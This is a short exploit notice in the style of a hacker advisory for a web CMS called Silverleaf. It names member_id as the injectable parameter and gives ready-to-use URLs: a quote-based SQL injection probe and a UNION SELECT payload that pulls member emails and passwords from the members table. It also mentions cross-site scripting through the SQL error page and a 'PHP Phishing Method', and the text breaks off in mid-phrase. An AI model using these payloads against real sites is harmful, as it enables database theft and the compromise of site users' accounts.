################################################# # Silverleaf CMS SQL Injection & XSS Vulnerable # # ################################################# ----'' Info '' ----- [+] CMS is Silverleaf [+] http://silverleafcms.com/ [+] Injection Part is: member_id= ############################################################################# Go Vulnerable like :: www.silverleafvuln.cms.com/?sec=member&member_id='SQL Injection SQL Injection :: www.silverleafvuln.cms.com/?sec=member&member_id=1 +and+1=0+union+select+[columns],group_concat(email,0x3a,pwd)+from+members-- ############################################################################# XSS with SQL ERROR for this Injection :: http://www.silverleafvuln.cms.com/?sec=member&member_id= PHP Phishing Method over